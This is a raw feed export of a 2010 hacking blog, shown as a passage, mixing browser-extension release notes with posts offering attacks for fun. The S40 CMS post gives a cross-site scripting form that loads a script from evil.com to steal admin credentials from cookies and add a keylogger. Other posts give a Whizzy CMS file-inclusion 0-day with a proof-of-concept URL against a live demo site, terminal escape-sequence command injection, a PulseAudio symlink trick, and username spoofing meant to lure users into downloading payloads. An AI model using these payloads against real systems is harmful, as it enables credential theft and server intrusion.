scheme='http://www.blogger.com/atom/ns#' term='fun'/><category scheme='http://www.blogger.com/atom/ns#' term='injection'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='chrome'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='google'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Chrome's ListMyTabs XSS</title><content type='html'>&lt;a href="https://chrome.google.com/extensions/detail/omegaibmlhmlmkfgjdagojmdopchimmp"&gt;ListMyTabs&lt;/a&gt;, a Google Chrome extension, which as you guessed lists all the open tabs/windows you have open by their title. So it takes whats ever in the title tags and pushes it on the list which is where our XSS comes from. If you goto a evil page with something like [img src="" onerror="alert('xss')"] in its title tags and you click &lt;a href="https://chrome.google.com/extensions/detail/omegaibmlhmlmkfgjdagojmdopchimmp"&gt;ListMyTabs&lt;/a&gt;'s browser action button we get a little alert box that says xss. &lt;br /&gt;&lt;br /&gt;Not much of a blog post i know, but it was fun wasn't it?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-3680523399151995219?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/3680523399151995219/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/07/chrome-extension-listmytabs-xss.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/3680523399151995219'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/3680523399151995219'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/07/chrome-extension-listmytabs-xss.html' title='Chrome&apos;s ListMyTabs XSS'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-7545335867418976237</id><published>2010-07-26T10:38:00.000-07:00</published><updated>2010-07-26T08:43:32.364-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='fun'/><category scheme='http://www.blogger.com/atom/ns#' term='injection'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='xss'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Using XSS to pwn</title><content type='html'>In this post i will go over how to pwn a server by exploiting just XSS. This is some what special circumstance but we will go over that a little later. I will also be targeting &lt;a href="http://s40.biz/"&gt;S40&lt;/a&gt; CMS for this post and giving out a few XSS 0-days in the process :) &lt;br /&gt;&lt;br /&gt;So our goal is to get the admin user name and password, but using XSS is not always the best way to go about it "note i said get login details not stealing sessions". Now due to some major security issues in S40 i can show you two ways to get the admin creds. If our victim checks the remember me box at the admin login page, S40 saves the user name and password "base64 encoded" in your cookie. Which brings us to our first XSS. S40 has a handy search function that happens to be open to XSS and allows for our entery point. Lets look at our attack code:&lt;br /&gt;&lt;br /&gt;xss_attack.html #Remember we have to get our victim to visit this page.&lt;br /&gt;[script languaje="JavaScript"]&lt;br /&gt;function func(){&lt;br /&gt; document.go.submit();&lt;br /&gt;}&lt;br /&gt;[/script]&lt;br /&gt;[form action="http://s40.biz" name="go" method="POST"]&lt;br /&gt;[input type='hidden' name='gsearchfield' value='&lt;span style="font-weight:bold;"&gt;"][script src=http://evil.com/xss.js][/script]&lt;/span&gt;']&lt;br /&gt;[script]func();[/script]&lt;br /&gt;&lt;br /&gt;The bold portion is our injection, the rest is just our form and javascript to auto submit. We see its including xss.js "Our XSS payload" from exil.com. Now xss.js's job is to get the cookie, scan it for login details and if it finds them, send them on to us. If not thats ok we can just move on to the next phase and have it inject more XSS in the user name "sfu" var in the cookie. &lt;br /&gt;&lt;br /&gt;We do this because later when the victim goes to login, S40 will look in the cookie for user name and password data. Then if it finds data it push it into the appropriate input fields on the login page. So if we injected a key logger as our payload for the second phase, and the admin goes to login your payload gets run and you get the login details! There you have it, going from XSS to pwn. It just takes a perfect storm of XSS which is sadly all to common.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-7545335867418976237?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/7545335867418976237/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/07/using-xss-to-pwn.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/7545335867418976237'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/7545335867418976237'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/07/using-xss-to-pwn.html' title='Using XSS to pwn'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-5663464215081486569</id><published>2010-07-23T06:13:00.000-07:00</published><updated>2010-07-23T06:35:39.619-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='fun'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='cons'/><title type='text'>Conf. Con 2010 coming up!</title><content type='html'>Conf. Con is only one day away! If its anything like the last one it should be well worth the wait! I'll see you there xD&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Sign up FREE for Conf.Con: &lt;a href="http://confcon.org/?page=signup"&gt;HERE&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;More info on conf.con: &lt;a href="http://confcon.org/"&gt;here&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-5663464215081486569?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/5663464215081486569/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/07/conf-con-2010-coming-up.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/5663464215081486569'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/5663464215081486569'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/07/conf-con-2010-coming-up.html' title='Conf. Con 2010 coming up!'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-8785594677701628051</id><published>2010-07-17T20:06:00.000-07:00</published><updated>2010-07-18T10:40:55.839-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='fun'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Having fun with CVE-2010-2713</title><content type='html'>Heres a fun little exploit i noticed the other day, at first i didnt have any idea wtf i was looking at. After a little research i found out that libvte was used by gnome-terminal and thats what really got me interested, it was something i could play with without having to do a bunch of shit ;p So whats going on anyway, well vte reports back a window or icon name to the term as if it was a command being issued and at the same time users are allowed to set the name of a window or icon and that is where the issue lies. The one catch is after the attack starts the victim has to hit the enter key to execute the command issued to the term from the attack, but this is very easy to get around. Ok lets test this baby out. Open a term and run this:&lt;br /&gt;&lt;br /&gt;export PS1="\033]0;;ls\007" &lt;= sets the window name to ;ls&lt;br /&gt;&lt;br /&gt;Then this:&lt;br /&gt;&lt;br /&gt;export PS1="\033]0;\a\e[21t\007" &lt;= sends the window name to the term&lt;br /&gt;&lt;br /&gt;Now all you have to do is hit enter and you should get a dir listing :D There is all kinds of ways to automate this so all the victim has to do is hit enter, you can even send a message telling the victim to hit enter to continue &gt;:) Thats it, enjoy.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-8785594677701628051?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/8785594677701628051/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/07/having-fun-with-cve-2010-2713.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/8785594677701628051'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/8785594677701628051'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/07/having-fun-with-cve-2010-2713.html' title='Having fun with CVE-2010-2713'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-876924782210242119</id><published>2010-07-14T19:46:00.000-07:00</published><updated>2010-07-15T06:29:51.503-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='injection'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><title type='text'>Whizzy CMS 10.01 0-day</title><content type='html'>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;br /&gt;[x] Type: Local File Inclusion&lt;br /&gt;[x] Vendor: Unverse.net&lt;br /&gt;[x] Script Name: Whizzy CMS&lt;br /&gt;[x] Script version: 10.01&lt;br /&gt;[x] Author: Anarchy Angel&lt;br /&gt;[x] Mail : anarchy[dot]ang31@gmail[dot]com&lt;br /&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;br /&gt;&lt;br /&gt;Exploit:&lt;br /&gt;http://site.org/?[LFI]&lt;br /&gt; &lt;br /&gt;Ex:&lt;br /&gt;http://site.org/?../../../../../../../etc/passwd&lt;br /&gt; &lt;br /&gt;PoC on live demo:&lt;br /&gt;http://www.unverse.net/whizzydemo/?../../../../../../../../../../../../etc/passwd&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;Special Tnx : lun0s, proge, sToRm, progenic, gny&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-876924782210242119?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/876924782210242119/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/07/whizzy-cms-1001-0-day.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/876924782210242119'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/876924782210242119'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/07/whizzy-cms-1001-0-day.html' title='Whizzy CMS 10.01 0-day'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-65677824888696884</id><published>2010-06-29T19:37:00.000-07:00</published><updated>2010-06-29T19:40:16.899-07:00</updated><title type='text'>Sweetness beta 0.8 released</title><content type='html'>This release has better message formatting, and set up relationships for full archiving. If you already have an older version installed, there is no need to download the update, it should get pushed to your system soon.&lt;br /&gt;&lt;br /&gt;DOWNLOAD: &lt;a href="http://dealerweb.grandcare.com/Sweetness.crx"&gt;HERE&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-65677824888696884?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/65677824888696884/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/sweetness-beta-08-released.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/65677824888696884'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/65677824888696884'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/sweetness-beta-08-released.html' title='Sweetness beta 0.8 released'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-7107440645947188394</id><published>2010-06-27T14:17:00.000-07:00</published><updated>2010-06-27T18:32:27.366-07:00</updated><title type='text'>Messing around with CVE-2009-1299</title><content type='html'>&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1299"&gt;CVE-2009-1299&lt;/a&gt;:&lt;br /&gt;&lt;br /&gt;The pa_make_secure_dir function in core-util.c in PulseAudio 0.9.10 and 0.9.19 allows local users to change the ownership and permissions of arbitrary files via a symlink attack on a /tmp/.esd-##### temporary file.&lt;br /&gt;&lt;br /&gt;So what happens? well first touch /home/$user$/test.txt, then make a symlink in the tmp dir called .esd-0 "0 is the uid for root" to /home/$user$/test.txt. now sudo su and run pulseaudio. exit your root shell and check out /home/$user$/test.txt and you will see its ownership has changed from the user you created it under to root:root.&lt;br /&gt;&lt;br /&gt;The worst you could do with this little guy is DoS the server and maybe have a little fun :D&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-7107440645947188394?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/7107440645947188394/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/messing-around-with-cve-2009-1299.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/7107440645947188394'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/7107440645947188394'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/messing-around-with-cve-2009-1299.html' title='Messing around with CVE-2009-1299'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-3996556941812377035</id><published>2010-06-13T14:02:00.000-07:00</published><updated>2010-06-15T19:57:57.247-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='injection'/><category scheme='http://www.blogger.com/atom/ns#' term='release'/><category scheme='http://www.blogger.com/atom/ns#' term='chrome'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='google'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>iPillage</title><content type='html'>iPillage is a chrome extension that scans any page you are browsing for SQL injection, Local file injection. It has useful information gathering tools like reverse DNS, hashing, and more!&lt;br /&gt;&lt;br /&gt;DOWNLOAD: &lt;a href="http://www.plunder.com/iPillage-download-0656394d50.htm"&gt;HERE&lt;/a&gt;&lt;br /&gt;Report bugs and stuff: &lt;a href="http://shortcode.freeforums.org/ipillage-f11.html"&gt;HERE&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-3996556941812377035?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/3996556941812377035/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/ipillage.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/3996556941812377035'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/3996556941812377035'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/ipillage.html' title='iPillage'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-216572341954770866</id><published>2010-06-09T13:07:00.001-07:00</published><updated>2010-06-13T14:21:49.026-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='archive'/><category scheme='http://www.blogger.com/atom/ns#' term='sugarcrm'/><category scheme='http://www.blogger.com/atom/ns#' term='release'/><category scheme='http://www.blogger.com/atom/ns#' term='gmail'/><category scheme='http://www.blogger.com/atom/ns#' term='chrome'/><category scheme='http://www.blogger.com/atom/ns#' term='sweetness'/><title type='text'>Sweetness beta 0.7 released</title><content type='html'>Fixed a few rendering bugs and made a few cosmetic changes as well. If you already have an older version installed, there is no need to download the update, it should get pushed to your system soon.&lt;br /&gt;&lt;br /&gt;DOWNLOAD: &lt;a href="http://dealerweb.grandcare.com/Sweetness.crx"&gt;HERE&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-216572341954770866?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/216572341954770866/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/sweetness-beta-07-released.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/216572341954770866'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/216572341954770866'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/sweetness-beta-07-released.html' title='Sweetness beta 0.7 released'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-8062227223873416834</id><published>2010-06-04T20:20:00.000-07:00</published><updated>2010-06-04T21:02:47.256-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='kb'/><title type='text'>Stuff of the week.</title><content type='html'>Here is a list of cool/fun stuff i found this week.&lt;br /&gt;&lt;br /&gt;A reminder that CSRF affects more than websites - &lt;a href="http://www.plunder.com/non-http-CSRF-txt-tar-bz2-download-776d066989.htm"&gt;READ IT HERE&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Flag execution for easy local privilege escalation. - &lt;a href="http://www.plunder.com/flag-execution-pdf-tar-bz2-download-7af1ffc67f.htm"&gt;READ IT HERE&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Cross Site URL Hijacking by using Error Object in Mozilla Firefox. - &lt;a href="http://www.plunder.com/xsuh-firefox-pdf-tar-bz2-download-d47367341d.htm"&gt;READ IT HERE&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-8062227223873416834?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/8062227223873416834/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/stuff-of-week.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/8062227223873416834'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/8062227223873416834'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/stuff-of-week.html' title='Stuff of the week.'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-2232972083211683647</id><published>2010-06-03T19:17:00.000-07:00</published><updated>2010-06-03T19:41:55.948-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='video'/><category scheme='http://www.blogger.com/atom/ns#' term='archive'/><category scheme='http://www.blogger.com/atom/ns#' term='sugarcrm'/><category scheme='http://www.blogger.com/atom/ns#' term='gmail'/><category scheme='http://www.blogger.com/atom/ns#' term='chrome'/><category scheme='http://www.blogger.com/atom/ns#' term='sweetness'/><title type='text'>Sweetness info video</title><content type='html'>Here is a nice little vid i made, its a howto for installing, setup and use of Sweetness&lt;br /&gt;&lt;br /&gt;Check it out &lt;a href="http://www.plunder.com/Sweetness-HowTo-video-download-3ccbf7e14c.htm"&gt;HERE&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-2232972083211683647?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/2232972083211683647/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/sweetness-info-video.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/2232972083211683647'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/2232972083211683647'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/sweetness-info-video.html' title='Sweetness info video'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-4011726879266289613</id><published>2010-06-01T13:32:00.000-07:00</published><updated>2010-06-02T05:26:18.628-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='archive'/><category scheme='http://www.blogger.com/atom/ns#' term='documentation'/><category scheme='http://www.blogger.com/atom/ns#' term='sugarcrm'/><category scheme='http://www.blogger.com/atom/ns#' term='gmail'/><category scheme='http://www.blogger.com/atom/ns#' term='chrome'/><category scheme='http://www.blogger.com/atom/ns#' term='sweetness'/><category scheme='http://www.blogger.com/atom/ns#' term='google'/><title type='text'>Getting your Gmail ID for Sweetness.</title><content type='html'>In order for Sweetness to operate you need to provide it with some vital information, like you sugar username, password, and server address but it also asks for something called a GMail ID. Getting your GMail ID is nice and easy, just access your gmail account and goto any email, then on the right hand side of the page look for the "Print all" link and click it. It should take you to a URL similar to this:&lt;br /&gt;&lt;blockquote&gt;https://mail.google.com/mail/?ui=2&amp;&lt;span style="font-weight:bold;"&gt;ik=g56532809b&lt;/span&gt;&amp;view=pt&amp;search=inbox&amp;th=132h510466b7hb5f&lt;/blockquote&gt;&lt;br /&gt;Your GMail ID is the "ik=xxx..." part of the above url so in this case your GMail ID would be:&lt;br /&gt;&lt;blockquote&gt;g56532809b&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-4011726879266289613?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/4011726879266289613/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/getting-your-gmail-id-for-sweetness.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/4011726879266289613'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/4011726879266289613'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/getting-your-gmail-id-for-sweetness.html' title='Getting your Gmail ID for Sweetness.'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-7412420079436655547</id><published>2010-06-01T11:21:00.000-07:00</published><updated>2010-06-01T11:23:13.721-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='unicode'/><category scheme='http://www.blogger.com/atom/ns#' term='injection'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='release'/><category scheme='http://www.blogger.com/atom/ns#' term='ipb'/><title type='text'>Invision Power Board 0-day</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://i212.photobucket.com/albums/cc94/Dl4All/dl4all/Invision-Power-Board.gif"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 150px; height: 146px;" src="http://i212.photobucket.com/albums/cc94/Dl4All/dl4all/Invision-Power-Board.gif" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;IPB is open to right-to-left unicode injection which allows you to obfuscate file names, links, and more. That's not all, because you can inject RTLO while registering you can copy any user name you like! Go to any IPBoard and try to register "&amp; #82 38;nimdA" w/o the quotes and spaces, you will see when you login it displays you as Admin! Now you can go on the forums and run wild as the Admin or any other user you like. No you don't get admin privs. or anything and if anyone looks close at a "spoofed" account its not to hard to spot, but its good for a few lulz and im sure you can get more then one n00b to dl a payload you posted as admin &gt;:) Ok thats all i got, laters.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-7412420079436655547?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/7412420079436655547/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/invision-power-board-0-day.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/7412420079436655547'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/7412420079436655547'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/06/invision-power-board-0-day.html' title='Invision Power Board 0-day'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://i212.photobucket.com/albums/cc94/Dl4All/dl4all/th_Invision-Power-Board.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-96724004536736670</id><published>2010-06-01T11:16:00.000-07:00</published><updated>2010-06-01T13:31:02.310-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='plunder'/><category scheme='http://www.blogger.com/atom/ns#' term='release'/><category scheme='http://www.blogger.com/atom/ns#' term='android'/><category scheme='http://www.blogger.com/atom/ns#' term='plunderoid'/><title type='text'>Plunderoid</title><content type='html'>Plunderoid is a Plunder app for Android! Search and download plundered files right from your phone!!!&lt;br /&gt;&lt;br /&gt;Current version: 1.0&lt;br /&gt;&lt;br /&gt;DOWNLOAD: &lt;a href="http://www.plunder.com/Plunderoid-download-3cfa96bbde.htm"&gt;HERE&lt;/a&gt;&lt;br /&gt;Report bugs: &lt;a href="http://shortcode.freeforums.org/plunderoid-f7.html"&gt;HERE&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' 